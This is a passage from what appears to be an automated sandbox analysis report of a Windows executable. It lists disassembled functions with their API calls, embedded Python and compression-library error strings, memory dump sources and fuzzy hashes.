                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$FormatString
                                                                                                                                                                                                            • String ID: item at offset %zd is too large for this platform$offset must be less than %zd$offset must be non-negative
                                                                                                                                                                                                            • API String ID: 4212644371-4235915021
                                                                                                                                                                                                            • Opcode ID: 107a9271cce8032e10f54d28ad269c3e1d5d24d506bb7d4b2dd9a9f2573d1f1f
                                                                                                                                                                                                            • Instruction ID: 64aba827d80e926b45a3aca8389eb027f6539ed9d952f33541f07bdbdb78ebf8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 107a9271cce8032e10f54d28ad269c3e1d5d24d506bb7d4b2dd9a9f2573d1f1f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02210866B26F4291DF04CF66E88016833A1FB88FE4B054632DE1E477A4DF3CD4A68314
                                                                                                                                                                                                            Function 00007FF7ACE87AB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE87AF1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE87B65
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                                                                            • Opcode ID: 92b52a23bf177b804bd471eb00781d9ecb554dad94de0916a037b448ee798d7d
                                                                                                                                                                                                            • Instruction ID: 108a2f5d446a2246b8831e8ed74b1f0d2a16c46b9871131daed29ae2ceefcc1b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92b52a23bf177b804bd471eb00781d9ecb554dad94de0916a037b448ee798d7d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B218031B0EB82A9EA10EF25A940079F3A2FB54BD1F994135DA4D637B5EF7CE4518310
                                                                                                                                                                                                            Function 00007FF8A8189200 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • BrotliEncoderCompressStream failed while flushing the stream, xrefs: 00007FF8A8189265
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Eval_StringThread$Bytes_Err_FromRestoreSaveSize
                                                                                                                                                                                                            • String ID: BrotliEncoderCompressStream failed while flushing the stream
                                                                                                                                                                                                            • API String ID: 32558519-1331232432
                                                                                                                                                                                                            • Opcode ID: eec6c1592467d7851157681b8be15a30cefc9024d732104c3139fffb5637aa06
                                                                                                                                                                                                            • Instruction ID: b08050bcefff437bd03b594e3fd07818105a8319f95ffdea401d5fdedaaae094
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eec6c1592467d7851157681b8be15a30cefc9024d732104c3139fffb5637aa06
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C921CB71A0E686A1FA469F65F545179B362FF84BD0F181531DA5E02AA8DF3CE080C324
                                                                                                                                                                                                            Function 00007FF8A7FF6BB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_FromLongLong_String
                                                                                                                                                                                                            • String ID: stream is closed$w*:readinto
                                                                                                                                                                                                            • API String ID: 1736172965-940828079
                                                                                                                                                                                                            • Opcode ID: 0a53a83c8eb999594bf23ad47a5177b93e379cc827bc7b98c9bfc6ab325b8598
                                                                                                                                                                                                            • Instruction ID: ae87d498e9c8ea391af2db26f7316d6cc3d76fc3f20c102d13c89d292b2268c0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a53a83c8eb999594bf23ad47a5177b93e379cc827bc7b98c9bfc6ab325b8598
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A21AE32A09B82A5EB608F29F85036D63A0FB89BD4F494236DA9D427A5DF3CD159C700
                                                                                                                                                                                                            Function 00007FF8A7FF7520 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeallocSize$Arg_Buffer_CallMethod_Object_ParseReleaseTuple_
                                                                                                                                                                                                            • String ID: OOO:__exit__$close
                                                                                                                                                                                                            • API String ID: 1693501500-2153562444
                                                                                                                                                                                                            • Opcode ID: 74f3c805e9c95b527fc37a03322e55e227abc9e419b50062a303fe7d1aa1c08b
                                                                                                                                                                                                            • Instruction ID: 11941a47dfd30899e4931cb2657275a67a577c08f15ed13b555fa1c6c50a02b5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74f3c805e9c95b527fc37a03322e55e227abc9e419b50062a303fe7d1aa1c08b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93215E62A1AB82A3EA458F65EA5437873A0FF94784F455236CA4D02A50DFBCF6B4C310
                                                                                                                                                                                                            Function 00007FF8A7FFC540 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeallocSize$Arg_Buffer_CallMethod_Object_ParseReleaseTuple_
                                                                                                                                                                                                            • String ID: OOO:__exit__$close
                                                                                                                                                                                                            • API String ID: 1693501500-2153562444
                                                                                                                                                                                                            • Opcode ID: 3c572e22220da3e932a53e0b8bf6c9fea54b6ebbd4a53f4819b4b32c239745a0
                                                                                                                                                                                                            • Instruction ID: 305d5380784172d8e9e61185b6036eea570db3f2dfa5618f6f82fa841ea73e2d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c572e22220da3e932a53e0b8bf6c9fea54b6ebbd4a53f4819b4b32c239745a0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48215E22A1AB81A3EA048F25EA1437833A0FB947C4F455236DA4D03A60DFBCE6B4C314
                                                                                                                                                                                                            Function 00007FF8A7FFEA20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Buffer_CallErr_Keywords_ObjectObject_ParseReleaseSizeStringTuple
                                                                                                                                                                                                            • String ID: cannot call compress() after compression finished$cannot perform operation before consuming output from previous operation$y*:compress
                                                                                                                                                                                                            • API String ID: 3333143287-2148570972
                                                                                                                                                                                                            • Opcode ID: 0c657455417b3c50efdc16a4862c66d865f2b4d9a9ca34aa2e21a244dfa6c718
                                                                                                                                                                                                            • Instruction ID: e88b8bee2ebdee10a557b4d074e2a1c6de1b72926da09c6b57d3141abcf7b4af
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c657455417b3c50efdc16a4862c66d865f2b4d9a9ca34aa2e21a244dfa6c718
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58214A66A07B02A2EB108F25E84026933E1FB48BC4F584535CE5D473A8DF7CD5A6C354
                                                                                                                                                                                                            Function 00007FF8A7FF26B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Long$Arg_Buffer_FromKeywords_Long_ParseReleaseSizeTupleUnsigned
                                                                                                                                                                                                            • String ID: error when determining content size$y*:frame_content_size
                                                                                                                                                                                                            • API String ID: 2385634623-1697504724
                                                                                                                                                                                                            • Opcode ID: 0b0a235e50e06c635956aae1f344942cd07f5547d4ecf8c6f51e81688638af81
                                                                                                                                                                                                            • Instruction ID: f6fdb230fc83e000daeaa947c3fb06c5741d48d9ec4bcb175bf610e7c1fe6d4d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b0a235e50e06c635956aae1f344942cd07f5547d4ecf8c6f51e81688638af81
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92115E22A1AA06A1EF208F71E85077D63A1FF98BF4F440231DA6E067E4DF7CE1559714
                                                                                                                                                                                                            Function 00007FF8A81775B0 Relevance: 12.2, APIs: 8, Instructions: 209COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 987259897-0
                                                                                                                                                                                                            • Opcode ID: 875df8bac6889bdd4c96d24d2b730484e49c8f4d92290b1a0dceb7b158c01e52
                                                                                                                                                                                                            • Instruction ID: 80b3945bbfaa18b1a45d22cdee85bd6c0ad96b4416c7fd1d75e4427142c49b45
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 875df8bac6889bdd4c96d24d2b730484e49c8f4d92290b1a0dceb7b158c01e52
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98B12676606BC08AE701CF69D494BAD7BA1F759F88F08813ACF4A1B799CB399405C731
                                                                                                                                                                                                            Function 00007FF8A81799D0 Relevance: 12.2, APIs: 8, Instructions: 202COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 987259897-0
                                                                                                                                                                                                            • Opcode ID: ee9fd3c6c5bb7b526fbf8716b278da73e115e98a552720bdc172b18b87a5640e
                                                                                                                                                                                                            • Instruction ID: eb533e775194e2720a4729815368105cea466e438f31d950303c3599212acdf1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee9fd3c6c5bb7b526fbf8716b278da73e115e98a552720bdc172b18b87a5640e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33A164B6205B848BDB19CF29C0A572DBBB0F759F88F158129CF8A07399DB39D405CB61
                                                                                                                                                                                                            Function 00007FF8A801BF70 Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF8A801BFE3
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C00F
                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF8A801C054
                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF8A801C061
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807702F
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077043
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077050
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807705D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077090
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807709D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770B9
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C08C
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C0B2
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C10A
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C149
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$free$Delete$ConditionVariableWake$EnterErrorLastLeaveObjectSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3165725256-0
                                                                                                                                                                                                            • Opcode ID: 4975a0d8b9817770834a0f7da573b2955d35367b132c0dc6fa3e507942e9970c
                                                                                                                                                                                                            • Instruction ID: 53dcaaa9623e1d0931e196f0e10b3acd991d0ff870b96a6ce63aeb1be4cd3f6d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4975a0d8b9817770834a0f7da573b2955d35367b132c0dc6fa3e507942e9970c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E51A226A1AE85D6EF55DF3194112BAA360FF85BD8F094131EE8E0B785DF3CE4908364
                                                                                                                                                                                                            Function 00007FF8A8076CC0 Relevance: 12.1, APIs: 8, Instructions: 114COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A801BC37,?,?,?,?,?,?), ref: 00007FF8A8076CE9
                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A801BC37,?,?,?,?,?,?), ref: 00007FF8A8076E37
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A801BC37,?,?,?,?,?,?), ref: 00007FF8A8076E41
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveVariableWake
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2831011342-0
                                                                                                                                                                                                            • Opcode ID: 3bc3eebcfe64cc9496d95d25e1160e512bc57c8bd2c0d618ca28407808da692e
                                                                                                                                                                                                            • Instruction ID: 4a85d3b417eebc0ad2dd3faca31bec5d9d6e36977bfd55f259830af676d87eea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bc3eebcfe64cc9496d95d25e1160e512bc57c8bd2c0d618ca28407808da692e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9416A32E1AF45A2EE20CF15E44026973A0FBA97C0F544531DB9E03B90DF38E8758728
                                                                                                                                                                                                            Function 00007FF7ACE99194 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: f$p$p
                                                                                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                                                                                            • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                            • Instruction ID: 6fd12ca7f0a0904bece7afa7476e9d33009f3bc6c9a924806eb8700c92d6cb9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6129072A0E243A6FB20BE15E0546BAF691FB40750FCA4175F68D566E4DF3CED808B21
